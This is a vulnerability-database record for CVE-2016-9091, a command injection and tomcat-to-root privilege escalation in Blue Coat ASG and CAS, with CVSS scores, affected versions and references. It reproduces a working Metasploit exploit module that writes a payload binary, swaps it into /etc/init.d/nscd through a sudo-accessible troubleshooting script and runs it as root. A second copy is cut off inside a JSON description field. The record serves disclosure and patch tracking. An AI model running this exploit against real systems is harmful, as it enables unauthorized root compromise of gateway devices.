CVE-2016-9091

Vulnerability from cvelistv5

Published

2017-04-05 15:00

Modified

2024-08-06 02:42

Severity ?

Summary

References

URL	Tags
secure@symantec.com	http://www.securityfocus.com/bid/97372	Third Party Advisory, VDB Entry
secure@symantec.com	https://bto.bluecoat.com/security-advisory/sa138	Mitigation, Vendor Advisory
secure@symantec.com	https://www.exploit-db.com/exploits/41785/
secure@symantec.com	https://www.exploit-db.com/exploits/41786/
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/97372	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://bto.bluecoat.com/security-advisory/sa138	Mitigation, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/41785/
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/41786/

Impacted products

Vendor

Product

Version

▼

Symantec Corporation

Blue Coat ASG

Version: 6.6 prior to 6.6.5.4

Symantec Corporation

Blue Coat CAS

Version: 1.3 prior to 1.3.7.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T02:42:10.359Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "97372",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/97372"
          },
          {
            "name": "41785",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/41785/"
          },
          {
            "name": "41786",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/41786/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bto.bluecoat.com/security-advisory/sa138"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Blue Coat ASG",
          "vendor": "Symantec Corporation",
          "versions": [
            {
              "status": "affected",
              "version": "6.6 prior to 6.6.5.4"
            }
          ]
        },
        {
          "product": "Blue Coat CAS",
          "vendor": "Symantec Corporation",
          "versions": [
            {
              "status": "affected",
              "version": "1.3 prior to 1.3.7.4"
            }
          ]
        }
      ],
      "datePublic": "2017-04-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "OS command injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-15T09:57:01",
        "orgId": "80d3bcb6-88de-48c2-a47e-aebf795f19b5",
        "shortName": "symantec"
      },
      "references": [
        {
          "name": "97372",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/97372"
        },
        {
          "name": "41785",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/41785/"
        },
        {
          "name": "41786",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/41786/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bto.bluecoat.com/security-advisory/sa138"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "secure@symantec.com",
          "ID": "CVE-2016-9091",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Blue Coat ASG",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "6.6 prior to 6.6.5.4"
                          }
                        ]
                      }
                    },
                    {
                      "product_name": "Blue Coat CAS",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "1.3 prior to 1.3.7.4"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Symantec Corporation"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "OS command injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "97372",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/97372"
            },
            {
              "name": "41785",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/41785/"
            },
            {
              "name": "41786",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/41786/"
            },
            {
              "name": "https://bto.bluecoat.com/security-advisory/sa138",
              "refsource": "CONFIRM",
              "url": "https://bto.bluecoat.com/security-advisory/sa138"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "80d3bcb6-88de-48c2-a47e-aebf795f19b5",
    "assignerShortName": "symantec",
    "cveId": "CVE-2016-9091",
    "datePublished": "2017-04-05T15:00:00",
    "dateReserved": "2016-10-28T00:00:00",
    "dateUpdated": "2024-08-06T02:42:10.359Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2016-9091\",\"sourceIdentifier\":\"secure@symantec.com\",\"published\":\"2017-04-05T15:59:00.170\",\"lastModified\":\"2024-11-21T03:00:35.027\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges.\"},{\"lang\":\"es\",\"value\":\"Blue Coat Advanced Security Gateway (ASG) 6.6 en versiones anteriores a 6.6.5.4 y el Sistema de An\u00e1lisis de Contenido (CAS) 1.3 en versiones anteriores a 1.3.7.4 son susceptibles a una vulnerabilidad de inyecci\u00f3n de comandos de OS. Un administrador malicioso autenticado puede ejecutar comandos de OS arbitrarios con privilegios de sistema elevados.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:S/C:C/I:C/A:C\",\"baseScore\":9.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":8.0,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bluecoat:advanced_secure_gateway:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"6.6.5.2\",\"matchCriteriaId\":\"2C0D9329-D60D-40F9-AE40-B5EDE0B52AB5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bluecoat:content_analysis_system_software:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.3.7.3\",\"matchCriteriaId\":\"DEFA49F6-C7C2-4450-9067-E06368A33C85\"}]}]}],\"references\":[{\"url\":\"http://www.securityfocus.com/bid/97372\",\"source\":\"secure@symantec.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://bto.bluecoat.com/security-advisory/sa138\",\"source\":\"secure@symantec.com\",\"tags\":[\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/41785/\",\"source\":\"secure@symantec.com\"},{\"url\":\"https://www.exploit-db.com/exploits/41786/\",\"source\":\"secure@symantec.com\"},{\"url\":\"http://www.securityfocus.com/bid/97372\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://bto.bluecoat.com/security-advisory/sa138\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/41785/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.exploit-db.com/exploits/41786/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. BlueCoatAdvancedSecureGateway (ASG) and ContentAnalysisSystem (CAS) are products of BlueCoatSystems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Bluecoat Products are prone to command-injection vulnerability because it fails to properly sanitize user-supplied input. This may aid in further attacks. The following products are affected: Advanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. Content Analysis System 1.3 prior to 1.3.7.4 is vulnerable. # Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS

Date: April 3, 2017

Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd

Contact: chrisdhebert[at]gmail.com

Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138

Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable

Tested on: BlueCoat CAS 1.3.7.1

CVE : cve-2016-9091

Timeline:

08/31/2016 (Vulnerablities Discovered) 03/31/2017 (Final Vendor Patch Confirmed) 04/03/2017 (Public Release)

Description: The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script.

Proof of Concept:

Metasploit Module - root priv escalation (via mvtroubleshooting.sh)

This module requires Metasploit: http://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe'

class Metasploit4 < Msf::Exploit::Local Rank = AverageRanking

include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::Local::Linux

def initialize(info={}) super( update_info( info, { 'Name' => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)', 'Description' => %q{ This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate privileges. In order to work, a tomcat session with access to sudo on the sudoers is needed. This module is useful for post exploitation of BlueCoat vulnerabilities, where typically web server privileges are acquired, and this user is allowed to execute sudo on the sudoers file. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Hebert ', 'Pete Paccione ', 'Corey Boyd ' ], 'DisclosureDate' => 'Vendor Contacted 8-31-2016', 'References' => [ ['EDB', '##TBD##'], ['CVE', '2016-9091' ], ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138'] ], 'Platform' => %w{ linux unix }, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ] ], 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, 'DefaultTarget' => 0, } )) register_options([ OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]), ], self.class) end

def check id=cmd_exec("id -un") if id!="tomcat" print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat") fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat") end

clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
if clprelease!="1.3.7.1"
  print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
  fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
end

return Exploit::CheckCode::Vulnerable

end def exploit print_status("#{peer} - Checking for vulnerable BlueCoat session...") if check != CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1") end

print_status("#{peer} - Running Exploit...")
exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
write_file(exe_file, generate_payload_exe)
cmd_exec "chmod +x #{exe_file}"

begin
  #Backup original nscd init script
  cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
  #Replaces /etc/init.d/nscd script with meterpreter payload
  cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
  #Executes meterpreter payload as root
  cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
  #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
ensure
  #Restores original nscd init script
  cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
  #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
  cmd_exec "/bin/rm -f #{exe_file}"
end
print_status("#{peer} - The exploit module has finished")
#Maybe something here to deal with timeouts?? noticied inconsistant..  Exploit failed: Rex::TimeoutError Operation timed out.

end end

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0485",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "advanced secure gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "bluecoat",
        "version": "6.6.5.2"
      },
      {
        "model": "content analysis system software",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "bluecoat",
        "version": "1.3.7.3"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "1.3.7.4"
      },
      {
        "model": "advanced secure gateway",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "software  6.6.5.4"
      },
      {
        "model": "advanced secure gateway",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "6.6"
      },
      {
        "model": "content analysis system software",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "blue coat",
        "version": "1.3"
      },
      {
        "model": "coat advanced secure gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "blue",
        "version": "6.6\u003c6.6.5.4"
      },
      {
        "model": "coat content analysis system",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "blue",
        "version": "1.3\u003c1.3.7.4"
      },
      {
        "model": "advanced secure gateway",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "bluecoat",
        "version": "6.6.5.2"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "bluecoat",
        "version": "1.3.7.3"
      },
      {
        "model": "content analysis system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.3"
      },
      {
        "model": "advanced secure gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.6"
      },
      {
        "model": "content analysis system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.3.7.4"
      },
      {
        "model": "advanced secure gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.6.5.4"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:bluecoat:advanced_secure_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.6.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:bluecoat:content_analysis_system_software:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "1.3.7.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Peter Paccione, Chris Hebert, and Corey Boyd.",
    "sources": [
      {
        "db": "BID",
        "id": "97372"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-9091",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-9091",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2017-05236",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "VHN-97911",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.2,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-9091",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-9091",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-05236",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201704-236",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-97911",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. BlueCoatAdvancedSecureGateway (ASG) and ContentAnalysisSystem (CAS) are products of BlueCoatSystems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Bluecoat Products are prone to command-injection vulnerability because it fails to properly sanitize user-supplied input. This may aid in further attacks. \nThe following products are affected:\nAdvanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. \nContent Analysis System 1.3 prior to 1.3.7.4 is vulnerable. # Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS\n# Date: April 3, 2017\n# Exploit Authors:  Chris Hebert, Peter Paccione and Corey Boyd\n# Contact: chrisdhebert[at]gmail.com\n# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138\n# Version: CAS 1.3 prior to 1.3.7.4 \u0026 ASG 6.6 prior to 6.6.5.4 are vulnerable\n# Tested on: BlueCoat CAS 1.3.7.1\n# CVE : cve-2016-9091\n \nTimeline:\n--------\n08/31/2016 (Vulnerablities Discovered)\n03/31/2017 (Final Vendor Patch Confirmed)\n04/03/2017 (Public Release)\n \nDescription:\nThe BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. \nA malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script. \n \nProof of Concept:\n \nMetasploit Module - root priv escalation (via mvtroubleshooting.sh)\n-----------------\n##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n \nrequire \u0027msf/core\u0027\nrequire \u0027rex\u0027\nrequire \u0027msf/core/exploit/local/linux\u0027\nrequire \u0027msf/core/exploit/exe\u0027\n \n \nclass Metasploit4 \u003c Msf::Exploit::Local\n  Rank = AverageRanking\n \n  include Msf::Exploit::EXE\n  include Msf::Post::File\n  include Msf::Exploit::Local::Linux\n \n  def initialize(info={})\n    super( update_info( info, {\n        \u0027Name\u0027          =\u003e \u0027BlueCoat CAS 1.3.7.1 tomcat-\u003eroot privilege escalation (via mvtroubleshooting.sh)\u0027,\n        \u0027Description\u0027   =\u003e %q{\n          This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate\n          privileges. In order to work, a tomcat session with access to sudo on the sudoers\n          is needed. This module is useful for post exploitation of BlueCoat\n          vulnerabilities, where typically web server privileges are acquired, and this\n          user is allowed to execute sudo on the sudoers file. \n        },\n        \u0027License\u0027        =\u003e MSF_LICENSE,\n        \u0027Author\u0027       =\u003e [\n         \u0027Chris Hebert \u003cchrisdhebert[at]gmail.com\u003e\u0027,\n         \u0027Pete Paccione \u003cpetepaccione[at]gmail.com\u003e\u0027,\n         \u0027Corey Boyd \u003ccorey.k.boyd[at]gmail.com\u003e\u0027\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u0027Vendor Contacted 8-31-2016\u0027,\n        \u0027References\u0027     =\u003e\n        [\n          [\u0027EDB\u0027, \u0027##TBD##\u0027],\n          [\u0027CVE\u0027, \u00272016-9091\u0027 ],\n          [\u0027URL\u0027, \u0027http://https://bto.bluecoat.com/security-advisory/sa138\u0027]\n        ],\n        \u0027Platform\u0027       =\u003e %w{ linux unix },\n        \u0027Arch\u0027           =\u003e [ ARCH_X86 ],\n        \u0027SessionTypes\u0027   =\u003e [ \u0027shell\u0027, \u0027meterpreter\u0027 ],\n        \u0027Targets\u0027        =\u003e\n          [\n            [ \u0027Linux x86\u0027,       { \u0027Arch\u0027 =\u003e ARCH_X86 } ]\n          ],\n        \u0027DefaultOptions\u0027 =\u003e { \"PrependSetresuid\" =\u003e true, \"WfsDelay\" =\u003e 2 },\n        \u0027DefaultTarget\u0027 =\u003e 0,\n      }\n      ))\n    register_options([\n        OptString.new(\"WritableDir\", [ false, \"A directory where we can write files\", \"/var/log\" ]),\n      ], self.class)\n  end\n \n  def check\n    id=cmd_exec(\"id -un\")\n    if id!=\"tomcat\"\n      print_status(\"#{peer} - ERROR - Session running as id= 